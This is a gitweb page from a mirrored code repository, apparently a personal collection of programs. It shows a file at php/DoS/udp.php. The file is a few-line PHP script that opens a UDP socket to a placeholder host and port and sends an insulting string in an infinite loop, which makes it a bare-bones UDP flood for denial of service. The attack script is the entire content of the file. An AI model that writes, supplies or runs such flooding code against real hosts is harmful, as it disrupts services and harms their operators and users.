GIT.Harvie.CZ
/
mirrors
/
Programs.git
/ blob
commit
grep
author
committer
pickaxe
?
search:
re
summary
|
shortlog
|
log
|
commit
|
commitdiff
|
tree
blame
|
history
|
raw
|
HEAD
Predavani pointeru se signalem
[mirrors/Programs.git]
/
php
/
DoS
/
udp.php
1
#!/usr/bin/php
2
<
?php
3
4
$fp
=
fsockopen
(
"udp://example.cz"
,
3212
);
5
while
(
1
)
fwrite
(
$fp
,
"LOOL-FUCK-U-ALLOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"
);
This page took
0.340209 seconds
and
4
git commands to generate.